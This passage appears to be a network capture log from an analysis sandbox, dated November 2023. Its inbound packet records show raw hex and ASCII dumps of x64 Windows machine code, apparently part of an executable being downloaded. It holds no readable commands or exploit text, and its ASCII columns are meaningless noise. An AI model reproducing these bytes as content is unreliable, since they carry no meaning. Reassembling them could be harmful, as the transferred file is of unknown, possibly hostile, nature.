2023-11-18 09:02:42 UTC	8738	IN	Data Raw: f3 0f e6 c0 f2 0f 10 9c c2 a0 64 15 00 f2 0f 10 a4 c2 a0 65 15 00 41 8b c0 2b c1 f2 41 0f 59 c0 48 8b 4c 24 68 99 44 0f 28 04 24 83 e2 1f 03 c2 c1 f8 05 f2 0f 5c f0 89 01 48 8b 44 24 70 41 f7 d8 f2 0f 59 f1 66 41 0f 6e c8 f3 0f e6 c9 f2 0f 11 18 f2 0f 59 4c 24 60 48 8b 44 24 78 f2 0f 59 cf 0f 28 7c 24 10 0f 28 c1 f2 0f 58 c6 0f 28 d0 f2 0f 59 15 76 84 14 00 f2 0f 58 15 7e 84 14 00 f2 0f 59 d0 f2 0f 58 15 82 84 14 00 f2 0f 59 d0 f2 0f 58 15 86 84 14 00 f2 0f 59 d0 f2 0f 59 c0 f2 0f 58 d5 f2 0f 59 d0 0f 28 c4 f2 0f 58 c3 f2 0f 58 d1 f2 0f 58 d6 0f 28 74 24 20 f2 0f 59 d0 f2 0f 58 d4 f2 0f 11 10 48 83 c4 38 c3 cc 48 89 5c 24 08 57 48 83 ec 30 48 63 d9 e8 32 26 00 00 48 8b f8 48 85 c0 75 12 48 8d 05 f7 b5 14 00 48 8b 5c 24 40 48 83 c4 30 5f c3 48 83 78 78 00 Data Ascii: deA+AYHL$hD($\HD$pAYfAnYL$`HD$xY(\|$(X(YvX~YXYXYYXY(XXX(t$ YXH8H\$WH0Hc2&HHuHH\$@H0_Hxx
2023-11-18 09:02:42 UTC	8739	IN	Data Raw: 86 18 00 8b d7 83 e2 3f 8d 4b 40 2b ca 33 c0 48 d3 c8 48 33 c7 48 8b 0d a9 cf 18 00 48 3b c8 74 1a 48 33 f9 8b ca 48 d3 cf 48 8b cf ff 15 8b 6a 14 00 45 33 c0 33 d2 33 c9 ff d7 48 8d 0d c3 d0 18 00 eb 0c 41 3b df 75 0d 48 8d 0d cd d0 18 00 e8 04 0c 00 00 90 85 db 75 13 48 8d 15 cc 6a 14 00 48 8d 0d a5 6a 14 00 e8 80 fc ff ff 48 8d 15 c9 6a 14 00 48 8d 0d ba 6a 14 00 e8 6d fc ff ff 0f b6 05 46 cf 18 00 85 f6 41 0f 44 c7 88 05 3a cf 18 00 eb 06 e8 17 0e 00 00 90 b9 02 00 00 00 e8 fc 60 00 00 85 f6 75 09 41 8b ce e8 1c 00 00 00 cc 48 8b 5c 24 30 48 8b 74 24 38 48 8b 7c 24 40 4c 8b 74 24 48 48 83 c4 20 41 5f c3 40 53 48 83 ec 20 8b d9 e8 73 28 00 00 84 c0 74 28 65 48 8b 04 25 60 00 00 00 8b 90 bc 00 00 00 c1 ea 08 f6 c2 01 75 11 ff 15 4a 68 14 00 48 8b c8 8b Data Ascii: ?K@+3HH3HH;tH3HHjE333HA;uHuHjHjHjHjmFAD:`uAH\$0Ht$8H\|$@Lt$HH A_@SH s(t(eH%`uJhH
2023-11-18 09:02:42 UTC	8740	IN	Data Raw: 85 c0 75 2b 48 39 1d 89 cb 18 00 75 04 33 c0 eb 1e e8 22 00 00 00 85 c0 75 f3 e8 c5 01 00 00 48 8b 0d 66 cb 18 00 85 c0 48 0f 45 cb 48 8b c1 48 83 c4 20 5b c3 cc cc cc 48 89 5c 24 08 57 48 83 ec 20 33 ff 48 39 3d 41 cb 18 00 74 04 33 c0 eb 48 e8 b6 68 00 00 e8 f5 6c 00 00 48 8b d8 48 85 c0 75 05 83 cf ff eb 27 48 8b c8 e8 34 00 00 00 48 85 c0 75 05 83 cf ff eb 0e 48 89 05 23 cb 18 00 48 89 05 04 cb 18 00 33 c9 e8 f1 08 00 00 48 8b cb e8 e9 08 00 00 8b c7 48 8b 5c 24 30 48 83 c4 20 5f c3 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 56 41 57 48 83 ec 30 33 f6 4c 8b f1 8b d6 eb 1a 3c 3d 74 03 48 ff c2 48 83 c8 ff 48 ff c0 40 38 34 01 75 f7 48 ff c1 48 03 c8 8a 01 84 c0 75 e0 48 8d 4a 01 ba 08 00 00 00 e8 e5 09 00 00 48 8b d8 48 85 c0 74 6c 4c 8b f8 41 Data Ascii: u+H9u3"uHfHEHH [H\$WH 3H9=At3HhlHHu'H4HuH#H3HH\$0H _H\$Hl$Ht$WAVAWH03L<=tHHH@84uHHuHJHHtlLA
2023-11-18 09:02:42 UTC	8742	IN	Data Raw: 41 8b c8 4c 8b 4b 08 83 e1 3f 48 8b 5b 10 49 33 e8 4d 33 c8 48 d3 cd 49 33 d8 49 d3 c9 48 d3 cb 4c 3b cb 0f 85 c7 00 00 00 48 2b dd b8 00 02 00 00 48 c1 fb 03 48 3b d8 48 8b fb 48 0f 47 f8 41 8d 44 24 e0 48 03 fb 48 0f 44 f8 48 3b fb 72 1f 45 8d 44 24 c8 48 8b d7 48 8b cd e8 7f 6c 00 00 33 c9 4c 8b f0 e8 bd 03 00 00 4d 85 f6 75 28 48 8d 7b 04 41 b8 08 00 00 00 48 8b d7 48 8b cd e8 5b 6c 00 00 33 c9 4c 8b f0 e8 99 03 00 00 4d 85 f6 0f 84 51 ff ff ff 4c 8b 05 dd 7a 18 00 4d 8d 0c de 41 8b c0 49 8d 1c fe 83 e0 3f 41 8b cc 2b c8 48 8b d6 48 d3 ca 48 8b c3 49 2b c1 49 33 d0 48 83 c0 07 49 8b ee 48 c1 e8 03 49 8b c9 4c 3b cb 48 0f 47 c6 48 85 c0 74 16 48 ff c6 48 89 11 48 8d 49 08 48 3b f0 75 f1 4c 8b 05 8b 7a 18 00 41 8b c0 41 8b cc 83 e0 3f 2b c8 49 8b 47 08 Data Ascii: ALK?H[I3M3HI3IHL;H+HH;HHGAD$HHDH;rED$HHl3LMu(H{AHH[l3LMQLzMAI?A+HHHI+I3HIHIL;HGHtHHHIH;uLzAA?+IG
2023-11-18 09:02:42 UTC	8743	IN	Data Raw: 00 00 cd 29 41 b8 01 00 00 00 ba 15 00 00 40 41 8d 48 02 e8 d2 0a 00 00 b9 03 00 00 00 e8 70 f1 ff ff cc cc cc cc 40 53 48 83 ec 20 4c 8b c2 48 8b d9 48 85 c9 74 0e 33 d2 48 8d 42 e0 48 f7 f3 49 3b c0 72 43 49 0f af d8 b8 01 00 00 00 48 85 db 48 0f 44 d8 eb 15 e8 f6 6c 00 00 85 c0 74 28 48 8b cb e8 d2 68 00 00 85 c0 74 1c 48 8b 0d ff c9 18 00 4c 8b c3 ba 08 00 00 00 ff 15 71 57 14 00 48 85 c0 74 d1 eb 0d e8 1d b1 ff ff c7 00 0c 00 00 00 33 c0 48 83 c4 20 5b c3 cc cc cc 40 53 48 83 ec 20 e8 c9 6c 00 00 8b d8 83 e3 3f e8 d9 6c 00 00 8b c3 48 83 c4 20 5b c3 cc cc cc 48 89 5c 24 18 48 89 74 24 20 57 48 83 ec 20 48 8b da 48 8b f9 e8 9a 6c 00 00 8b f0 89 44 24 38 8b cb f7 d1 81 c9 7f 80 ff ff 23 c8 23 fb 0b cf 89 4c 24 30 80 3d 7d 75 18 00 00 74 25 f6 c1 40 74 Data Ascii: )A@AHp@SH LHHt3HBHI;rCIHHDlt(HhtHLqWHt3H [@SH l?lH [H\$Ht$ WH HHlD$8##L$0=}ut%@t
2023-11-18 09:02:42 UTC	8744	IN	Data Raw: e9 48 83 e9 40 48 f7 d9 49 d3 e0 4d 0b c8 eb 29 66 0f 1f 84 00 00 00 00 00 48 f7 d9 49 8b c1 49 d3 e2 49 d3 e1 48 83 e9 40 48 f7 d9 48 d3 e8 4c 0b d0 49 d3 e8 4d 0b c8 90 49 81 c3 ff 03 00 00 49 0f ba f2 34 49 8b cb 4c 0b d2 48 c1 e1 34 4c 0b d1 66 49 0f 6e c2 66 0f 6f c8 66 0f 73 d1 1b 66 0f 73 f1 1b 66 0f 6f d0 f2 0f 5c d1 0f 16 c0 0f 16 d1 66 0f 6f 0d 9e 9e 14 00 66 0f 6f 1d a6 9e 14 00 66 0f 6f 25 ae 9e 14 00 48 33 c9 49 0f bd c9 48 83 e9 40 48 f7 d9 49 d3 e1 49 c1 e9 0c 48 83 c1 34 4c 2b d9 49 c1 e3 34 4c 0b ca 4d 0b cb 66 49 0f 6e e9 66 0f 59 c1 66 0f 59 e9 66 0f 59 da 66 0f 59 e2 0f 12 cb 0f 12 d4 f2 0f 5c c8 f2 0f 58 cb 0f 12 d8 f2 0f 58 ca f2 0f 58 dd f2 0f 58 cc f2 0f 58 cb 66 0f 6f d0 f2 0f 58 c1 f2 0f 5c d0 f2 0f 58 ca 48 8b 04 24 48 83 c4 18 Data Ascii: H@HIM)fHIIIH@HHLIMII4ILH4LfInfofsfsfo\fofofo%H3IH@HIIH4L+I4LMfInfYfYfYfY\XXXXXfoX\XH$H
2023-11-18 09:02:42 UTC	8746	IN	Data Raw: f7 ff ff eb 12 48 b9 00 00 00 00 00 00 08 00 48 0b c1 48 89 44 24 60 f2 0f 10 44 24 60 48 83 c4 58 c3 cc cc 41 b8 20 00 00 00 48 8d 15 4b 75 15 00 e9 4a ff ff ff cc cc 48 89 5c 24 10 48 89 74 24 18 55 57 41 56 48 8d ac 24 10 fb ff ff 48 81 ec f0 05 00 00 48 8b 05 14 6b 18 00 48 33 c4 48 89 85 e0 04 00 00 41 8b f8 8b f2 8b d9 83 f9 ff 74 05 e8 0d 48 ff ff 33 d2 48 8d 4c 24 70 41 b8 98 00 00 00 e8 17 54 ff ff 33 d2 48 8d 4d 10 41 b8 d0 04 00 00 e8 06 54 ff ff 48 8d 44 24 70 48 89 44 24 48 48 8d 4d 10 48 8d 45 10 48 89 44 24 50 ff 15 a9 4d 14 00 4c 8b b5 08 01 00 00 48 8d 54 24 40 49 8b ce 45 33 c0 ff 15 99 4d 14 00 48 85 c0 74 36 48 83 64 24 38 00 48 8d 4c 24 60 48 8b 54 24 40 4c 8b c8 48 89 4c 24 30 4d 8b c6 48 8d 4c 24 58 48 89 4c 24 28 48 8d 4d 10 48 89 Data Ascii: HHHD$`D$`HXA HKuJH\$Ht$UWAVH$HHkH3HAtH3HL$pAT3HMATHD$pHD$HHMHEHD$PMLHT$@IE3MHt6Hd$8HL$`HT$@LHL$0MHL$XHL$(HMH
2023-11-18 09:02:42 UTC	8747	IN	Data Raw: ee ff ff 48 8b 4d e8 48 8b 49 78 e8 b3 ee ff ff 48 8b 4d e8 48 8b 89 80 00 00 00 e8 a3 ee ff ff 48 8b 4d e8 48 8b 89 c0 03 00 00 e8 93 ee ff ff 4c 8d 4d 20 4c 8d 45 f0 48 8d 55 28 48 8d 4d 18 e8 0e fd ff ff 4c 8d 4d e0 4c 8d 45 f8 48 8d 55 e4 48 8d 4d 18 e8 e1 fd ff ff 48 83 c4 40 5d c3 cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b f9 48 8b da 48 8b 89 90 00 00 00 48 85 c9 74 2c e8 1f 63 00 00 48 8b 8f 90 00 00 00 48 3b 0d 4d b2 18 00 74 17 48 8d 05 ec 65 18 00 48 3b c8 74 0b 83 79 10 00 75 05 e8 f8 60 00 00 48 89 9f 90 00 00 00 48 85 db 74 08 48 8b cb e8 58 60 00 00 48 8b 5c 24 30 48 83 c4 20 5f c3 cc 40 53 48 83 ec 20 8b 0d a0 65 18 00 83 f9 ff 74 2a e8 02 05 00 00 48 8b d8 48 85 c0 74 1d 8b 0d 88 65 18 00 33 d2 e8 45 05 00 00 48 8b cb e8 6d fe ff ff 48 Data Ascii: HMHIxHMHHMHLM LEHU(HMLMLEHUHMH@]H\$WH HHHHt,cHH;MtHeH;tyu`HHtHX`H\$0H _@SH et*HHte3EHmH
2023-11-18 09:02:42 UTC	8748	IN	Data Raw: 00 e8 44 fd ff ff 48 8b d8 48 85 c0 74 10 48 8b c8 ff 15 37 45 14 00 48 8b cf ff d3 eb 06 ff 15 02 44 14 00 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc 48 89 5c 24 08 57 48 83 ec 20 8b d9 4c 8d 0d 41 97 14 00 b9 04 00 00 00 4c 8d 05 2d 97 14 00 48 8d 15 8e 46 14 00 e8 ed fc ff ff 48 8b f8 48 85 c0 74 0f 48 8b c8 ff 15 e0 44 14 00 8b cb ff d7 eb 08 8b cb ff 15 c2 43 14 00 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc 48 89 5c 24 08 57 48 83 ec 20 8b d9 4c 8d 0d f1 96 14 00 b9 05 00 00 00 4c 8d 05 dd 96 14 00 48 8d 15 46 46 14 00 e8 95 fc ff ff 48 8b f8 48 85 c0 74 0f 48 8b c8 ff 15 88 44 14 00 8b cb ff d7 eb 08 8b cb ff 15 5a 43 14 00 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b da 4c 8d 0d 9b 96 14 00 8b f9 48 8d Data Ascii: DHHtH7EHDH\$0H _H\$WH LAL-HFHHtHDCH\$0H _H\$WH LLHFFHHtHDZCH\$0H _H\$Ht$WH HLH
2023-11-18 09:02:42 UTC	8753	IN	Data Raw: 89 7c 24 28 89 7c 24 20 e9 80 00 00 00 41 b9 03 00 00 00 45 8b f7 45 8d 61 ff 41 8d 59 08 41 8b c4 83 fd 6b 7d 12 45 8d 4c 24 02 41 8b c7 41 8d 5c 24 08 45 8d 74 24 03 89 7c 24 50 44 8b c5 89 7c 24 48 41 8b d7 89 7c 24 40 33 c9 44 89 64 24 38 89 7c 24 30 89 7c 24 28 89 44 24 20 e8 cb 00 00 00 44 8b 46 14 44 8b cb 89 7c 24 50 41 8b cf 89 7c 24 48 89 7c 24 40 44 89 64 24 38 89 7c 24 30 89 7c 24 28 44 89 74 24 20 41 8b d7 e8 9b 00 00 00 44 8b 0d 14 52 18 00 8b 0d 1e 52 18 00 44 8b 46 1c 44 3b c9 7d 24 45 3b c1 0f 8c 9e fd ff ff 44 3b c1 0f 8f 95 fd ff ff 45 3b c1 7e 25 44 3b c1 7d 20 41 8b c7 e9 85 fd ff ff 44 3b c1 7c f3 45 3b c1 7f ee 44 3b c1 7e 09 45 3b c1 0f 8c 6b fd ff ff 6b 4e 08 3c 03 4e 04 6b d1 3c 03 16 69 c2 e8 03 00 00 45 3b c1 75 11 3b 05 b0 51 Data Ascii: \|$(\|$ AEEaAYAk}EL$AA\$Et$\|$PD\|$HA\|$@3Dd$8\|$0\|$(D$ DFD\|$PA\|$H\|$@Dd$8\|$0\|$(Dt$ ADRRDFD;}$E;D;E;~%D;} AD;\|E;D;~E;kkN<Nk<iE;u;Q
2023-11-18 09:02:42 UTC	8757	IN	Data Raw: 58 c3 c5 e9 eb 15 aa 86 14 00 c5 eb 5c 15 a2 86 14 00 c5 d1 73 d2 34 c5 e9 db 15 35 86 14 00 c5 f9 28 c2 c5 d1 fa 2d 49 87 14 00 c5 fa e6 f5 e9 7b fe ff ff 75 2e c5 fb 10 0d c6 85 14 00 44 8b 05 bf 87 14 00 e8 2a 47 00 00 c5 f9 6f 74 24 20 48 83 c4 58 c3 66 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 c5 fb 10 0d b8 85 14 00 44 8b 05 95 87 14 00 e8 fc 46 00 00 c5 f9 6f 74 24 20 48 83 c4 58 c3 90 48 3b 05 89 85 14 00 74 27 48 3b 05 70 85 14 00 74 ce 48 0b 05 97 85 14 00 c4 e1 f9 6e c8 44 8b 05 63 87 14 00 e8 c6 46 00 00 66 0f 1f 44 00 00 c5 f9 6f 74 24 20 48 83 c4 58 c3 cc 40 53 48 83 ec 30 41 8b d8 4c 8b c2 48 8b d1 48 8d 4c 24 20 e8 63 66 ff ff 48 8b d0 41 b1 01 44 8b c3 33 c9 e8 67 66 ff ff 48 83 c4 30 5b c3 cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 Data Ascii: X\s45(-I{u.D*Got$ HXfffffffDFot$ HXH;t'H;ptHnDcFfDot$ HX@SH0ALHHL$ cfHAD3gfH0[HHXHhHp
2023-11-18 09:02:42 UTC	8761	IN	Data Raw: 14 00 48 89 55 df 48 8d 05 7e 77 14 00 48 89 55 e7 48 89 45 bf 48 89 45 c7 48 8d 05 6f 77 14 00 48 89 45 cf 48 89 45 d7 48 8d 05 70 77 14 00 48 89 45 ff 48 8d 05 75 77 14 00 48 89 45 0f 48 8d 05 7a 77 14 00 48 89 45 1f 48 8d 05 7f 77 14 00 48 89 45 2f 48 89 55 07 48 89 55 27 8d 51 ff 1b c9 4c 89 45 ef 48 c1 e2 02 f7 d1 83 e1 02 4c 89 45 f7 8b c1 48 03 c2 4c 89 45 17 4c 89 45 37 4c 8b 44 c5 bf 48 83 c8 ff 48 ff c0 41 80 3c 00 00 75 f6 4c 3b d0 0f 97 c0 45 33 c0 84 c0 41 0f 94 c0 44 03 c1 49 8b c9 4c 03 c2 49 8b d2 4e 8b 44 c5 bf e8 c4 b7 ff ff 85 c0 0f 84 0b ff ff ff 48 83 64 24 20 00 45 33 c9 45 33 c0 33 d2 33 c9 e8 4f c5 ff ff cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 54 41 55 41 56 41 57 48 83 ec 60 4d 8b e9 49 8b e8 48 8b f2 4c 8b f9 Data Ascii: HUH~wHUHEHEHowHEHEHpwHEHuwHEHzwHEHwHE/HUHU'QLEHLEHLELE7LDHHA<uL;E3ADILINDHd$ E3E333OH\$Hl$Ht$WATAUAVAWH`MIHL
2023-11-18 09:02:42 UTC	8765	IN	Data Raw: ff ff 90 48 8b cf e8 13 00 00 00 90 8b 0b e8 0b fa ff ff 48 8b 5c 24 30 48 83 c4 20 5f c3 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b 01 48 8b d9 48 8b 10 48 8b 82 88 00 00 00 8b 50 04 89 15 60 72 18 00 48 8b 01 48 8b 10 48 8b 82 88 00 00 00 8b 50 08 89 15 4e 72 18 00 48 8b 01 48 8b 10 48 8b 82 88 00 00 00 48 8b 88 20 02 00 00 48 89 0d 4b 72 18 00 48 8b 03 48 8b 08 48 8b 81 88 00 00 00 48 83 c0 0c 74 17 f2 0f 10 00 f2 0f 11 05 1c 72 18 00 8b 40 08 89 05 1b 72 18 00 eb 1f 33 c0 48 89 05 08 72 18 00 89 05 0a 72 18 00 e8 7d 59 ff ff c7 00 16 00 00 00 e8 be b4 ff ff 48 8b 03 bf 02 00 00 00 48 8b 08 8d 77 7e 48 8b 81 88 00 00 00 48 8d 0d 9e 24 18 00 48 83 c0 18 74 52 8b d7 0f 10 00 0f 11 01 0f 10 48 10 0f 11 49 10 0f 10 40 20 0f 11 41 20 0f 10 48 30 0f Data Ascii: HH\$0H _H\$Ht$WH HHHHP`rHHHPNrHHHH HKrHHHHtr@r3Hrr}YHHw~HH$HtRHI@ A H0
2023-11-18 09:02:42 UTC	8769	IN	Data Raw: 48 8d 0c 38 4c 8b c3 33 d2 e8 47 f7 fe ff 48 8b c6 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 cc cc cc 48 83 ec 28 ff 15 1a f0 13 00 48 85 c0 48 89 05 38 62 18 00 0f 95 c0 48 83 c4 28 c3 48 83 25 28 62 18 00 00 b0 01 c3 cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 83 ec 20 48 8b f2 48 8b f9 48 3b ca 75 04 b0 01 eb 5c 48 8b d9 48 8b 2b 48 85 ed 74 0f 48 8b cd ff 15 2d f2 13 00 ff d5 84 c0 74 09 48 83 c3 10 48 3b de 75 e0 48 3b de 74 d4 48 3b df 74 2d 48 83 c3 f8 48 83 7b f8 00 74 15 48 8b 33 48 85 f6 74 0d 48 8b ce ff 15 f8 f1 13 00 33 c9 ff d6 48 83 eb 10 48 8d 43 08 48 3b c7 75 d7 32 c0 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b f1 48 3b ca 74 26 48 8d 5a Data Ascii: H8L3GHH\$0Hl$8Ht$@H _H(HH8bH(H%(bH\$Hl$Ht$WH HHH;u\HH+HtH-tHH;uH;tH;t-HH{tH3HtH3HHCH;u2H\$0Hl$8Ht$@H _H\$Ht$WH HH;t&HZ
2023-11-18 09:02:42 UTC	8770	IN	Data Raw: a7 ff ff 4c 8b e8 48 85 c0 75 08 83 c8 ff e9 22 02 00 00 48 8b 08 48 8b 15 c9 37 14 00 48 c1 e2 04 48 03 d1 eb 09 39 79 04 74 0b 48 83 c1 10 48 3b ca 75 f2 33 c9 33 c0 48 85 c9 0f 95 c0 85 c0 75 12 e8 c7 46 ff ff c7 00 16 00 00 00 e8 08 a2 ff ff eb b7 48 8d 59 08 40 32 f6 40 88 b4 24 80 00 00 00 eb 3f 83 e9 02 74 33 83 e9 04 74 13 83 e9 09 74 20 83 e9 06 74 12 83 f9 01 74 04 33 db eb 22 48 8d 1d 6d 5f 18 00 eb 19 48 8d 1d 5c 5f 18 00 eb 10 48 8d 1d 63 5f 18 00 eb 07 48 8d 1d 42 5f 18 00 48 83 a4 24 98 00 00 00 00 40 84 f6 74 0b b9 03 00 00 00 e8 ea e5 ff ff 90 40 84 f6 74 17 48 8b 15 bd 0a 18 00 8b ca 83 e1 3f 48 33 13 48 d3 ca 4c 8b fa eb 03 4c 8b 3b 49 83 ff 01 0f 94 c0 88 84 24 88 00 00 00 84 c0 0f 85 bf 00 00 00 4d 85 ff 75 18 40 84 f6 74 09 41 8d 4f Data Ascii: LHu"HH7HH9ytHH;u33HuFHY@2@$?t3tt tt3"Hm_H\_Hc_HB_H$@t@tH?H3HLL;I$Mu@tAO
2023-11-18 09:02:42 UTC	8774	IN	Data Raw: 52 48 83 cf ff 48 ff c7 80 3c 3e 00 75 f7 48 83 38 00 74 3f 48 8b 0b 48 83 c8 ff 48 ff c0 80 3c 01 00 75 f7 48 3b c7 76 15 80 3c 39 3d 75 0f 4c 8b c7 48 8b d6 e8 47 24 00 00 85 c0 74 0a 48 83 c3 08 48 83 3b 00 eb ca 48 8b 03 48 ff c0 48 03 c7 eb 02 33 c0 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 48 8b c4 48 89 58 08 48 89 70 10 48 89 78 18 4c 89 70 20 41 57 48 83 ec 30 4d 8b f9 49 8b f0 48 8b fa 4c 8b f1 b9 0b 00 00 00 e8 8d d5 ff ff 90 33 db 8b c3 4d 85 f6 0f 95 c0 85 c0 75 13 e8 e1 35 ff ff bb 16 00 00 00 89 18 e8 21 91 ff ff eb 6e 49 89 1e 48 85 ff 74 0a 48 85 f6 75 0a 48 85 ff 75 0c 48 85 f6 75 07 b8 01 00 00 00 eb 02 8b c3 85 c0 74 c9 48 85 ff 74 02 88 1f 49 8b cf e8 f4 fe ff ff 4c 8b c0 48 85 c0 74 33 48 83 c8 ff 48 ff c0 41 38 1c 00 75 f7 48 Data Ascii: RHH<>uH8t?HHH<uH;v<9=uLHG$tHH;HHH3H\$0Ht$8H _HHXHpHxLp AWH0MIHL3Mu5!nIHtHuHuHutHtILHt3HHA8uH
2023-11-18 09:02:42 UTC	8778	IN	Data Raw: 68 cb fe ff 44 8b 9d 20 03 00 00 41 83 fb 01 0f 87 a2 00 00 00 8b 85 24 03 00 00 85 c0 75 0f 45 33 ff 44 89 bd 50 01 00 00 e9 09 03 00 00 83 f8 01 0f 84 00 03 00 00 45 85 ff 0f 84 f7 02 00 00 45 33 c0 4c 8b d0 45 33 c9 42 8b 8c 8d 54 01 00 00 41 8b c0 49 0f af ca 48 03 c8 4c 8b c1 42 89 8c 8d 54 01 00 00 49 c1 e8 20 41 ff c1 45 3b cf 75 d7 45 85 c0 74 34 83 bd 50 01 00 00 73 73 1a 8b 85 50 01 00 00 44 89 84 85 54 01 00 00 44 8b bd 50 01 00 00 41 ff c7 eb 88 45 33 ff 44 89 bd 50 01 00 00 32 c0 e9 8e 02 00 00 44 8b bd 50 01 00 00 e9 80 02 00 00 41 83 ff 01 0f 87 ad 00 00 00 8b 9d 54 01 00 00 4d 8b c3 49 c1 e0 02 45 8b fb 44 89 9d 50 01 00 00 4d 85 c0 74 40 b8 cc 01 00 00 48 8d 8d 54 01 00 00 4c 3b c0 77 0e 48 8d 95 24 03 00 00 e8 72 ca fe ff eb 1a 4c 8b c0 Data Ascii: hD A$uE3DPEE3LE3BTAIHLBTI AE;uEt4PssPDTDPAE3DP2DPATMIEDPMt@HTL;wH$rL
2023-11-18 09:02:42 UTC	8782	IN	Data Raw: 8b f1 33 db 8b c3 81 f9 00 20 00 00 0f 92 c0 85 c0 75 15 e8 67 15 ff ff bb 09 00 00 00 89 18 e8 a7 70 ff ff 8b c3 eb 64 b9 07 00 00 00 e8 e5 b4 ff ff 90 48 8b fb 48 89 5c 24 20 8b 05 96 2b 18 00 3b f0 7c 3b 4c 8d 3d 8b 27 18 00 49 39 1c ff 74 02 eb 22 e8 aa fe ff ff 49 89 04 ff 48 85 c0 75 05 8d 58 0c eb 19 8b 05 6a 2b 18 00 83 c0 40 89 05 61 2b 18 00 48 ff c7 48 89 7c 24 20 eb c1 b9 07 00 00 00 e8 e1 b4 ff ff eb 98 48 8b 5c 24 40 48 8b 74 24 48 48 8b 7c 24 50 48 83 c4 30 41 5f c3 cc 48 63 c9 48 8d 15 2a 27 18 00 48 8b c1 83 e1 3f 48 c1 f8 06 48 c1 e1 06 48 03 0c c2 48 ff 25 99 b9 13 00 cc 48 63 c9 48 8d 15 06 27 18 00 48 8b c1 83 e1 3f 48 c1 f8 06 48 c1 e1 06 48 03 0c c2 48 ff 25 bd b9 13 00 cc 48 89 5c 24 08 48 89 74 24 10 48 89 7c 24 18 41 56 48 83 ec Data Ascii: 3 ugpdHH\$ +;\|;L='I9t"IHuXj+@a+HH\|$ H\$@Ht$HH\|$PH0A_HcH*'H?HHHH%HcH'H?HHHH%H\$Ht$H\|$AVH
2023-11-18 09:02:42 UTC	8786	IN	Data Raw: 02 00 00 00 48 8d 55 e0 88 45 e0 44 88 6d e1 eb 45 e8 48 6d ff ff 0f b6 0f ba 00 80 00 00 66 85 14 48 74 29 49 3b fc 0f 83 ef 00 00 00 41 b8 02 00 00 00 48 8d 4d c0 48 8b d7 e8 b7 8b ff ff 83 f8 ff 0f 84 f4 00 00 00 48 ff c7 eb 1b 41 b8 01 00 00 00 48 8b d7 48 8d 4d c0 e8 97 8b ff ff 83 f8 ff 0f 84 d4 00 00 00 48 83 64 24 38 00 48 8d 45 e8 48 83 64 24 30 00 4c 8d 45 c0 8b 4d cc 41 b9 01 00 00 00 c7 44 24 28 05 00 00 00 33 d2 48 89 44 24 20 48 ff c7 ff 15 1d ab 13 00 44 8b f0 85 c0 0f 84 94 00 00 00 48 8b 4d d0 4c 8d 4d c8 48 83 64 24 20 00 48 8d 55 e8 44 8b c0 ff 15 2f a9 13 00 33 d2 85 c0 74 6b 8b 4b 08 2b 4d d8 03 cf 89 4b 04 44 39 75 c8 72 62 41 80 fd 0a 75 34 48 8b 4d d0 8d 42 0d 48 89 54 24 20 44 8d 42 01 48 8d 55 c4 66 89 45 c4 4c 8d 4d c8 ff 15 f0 Data Ascii: HUEDmEHmfHt)I;AHMHHAHHMHd$8HEHd$0LEMAD$(3HD$ HDHMLMHd$ HUD/3tkK+MKD9urbAu4HMBHT$ DBHUfELM
2023-11-18 09:02:42 UTC	8790	IN	Data Raw: 41 5e 41 5d 41 5c 5f 5e 5b 5d c3 cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 60 48 8b f2 49 8b d9 48 8b d1 41 8b f8 48 8d 4c 24 40 e8 a3 b9 fe ff 8b 84 24 a8 00 00 00 48 8d 4c 24 48 89 44 24 38 4c 8b cb 8b 84 24 a0 00 00 00 44 8b c7 89 44 24 30 48 8b d6 48 8b 84 24 98 00 00 00 48 89 44 24 28 8b 84 24 90 00 00 00 89 44 24 20 e8 06 fc ff ff 80 7c 24 58 00 74 0c 48 8b 4c 24 40 83 a1 a8 03 00 00 fd 48 8b 5c 24 70 48 8b 74 24 78 48 83 c4 60 5f c3 cc cc cc cc cc cc cc 66 89 4c 24 08 48 83 ec 38 48 8b 0d e0 c1 17 00 48 83 f9 fe 75 0c e8 59 02 00 00 48 8b 0d ce c1 17 00 48 83 f9 ff 75 07 b8 ff ff 00 00 eb 25 48 83 64 24 20 00 4c 8d 4c 24 48 41 b8 01 00 00 00 48 8d 54 24 40 ff 15 7d 9a 13 00 85 c0 74 d9 0f b7 44 24 40 48 83 c4 38 c3 cc cc cc 48 89 5c 24 08 4c Data Ascii: A^A]A\_^[]H\$Ht$WH`HIHAHL$@$HL$HD$8L$DD$0HH$HD$($D$ \|$XtHL$@H\$pHt$xH`_fL$H8HHuYHHu%Hd$ LL$HAHT$@}tD$@H8H\$L
2023-11-18 09:02:42 UTC	8794	IN	Data Raw: 48 8d 54 24 60 48 8b 4c 24 30 e8 37 02 00 00 85 c0 74 13 f2 0f 10 4c 24 60 48 8b 8c 24 90 00 00 00 e8 d0 f7 0f 00 48 8b 4c 24 70 48 33 cc e8 03 7b fe ff 48 81 c4 88 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc 48 89 74 24 20 57 48 83 ec 30 48 8b f9 48 8d 15 9c ca 15 00 49 8b 08 49 8b f0 0f b7 41 08 83 e0 3f 0f b6 14 10 83 ea 01 0f 84 72 01 00 00 83 ea 01 0f 84 fa 00 00 00 48 89 5c 24 48 83 ea 01 74 50 83 fa 01 75 3b e8 95 fc 0f 00 48 8b d8 48 85 c0 74 2e 48 8b 0e e8 45 fc 0f 00 83 f8 08 75 21 48 8b 0f b8 00 24 00 00 48 8b 13 66 85 41 08 0f 85 9b 00 00 00 48 89 11 b8 04 00 00 00 66 89 41 08 48 8b 5c 24 48 48 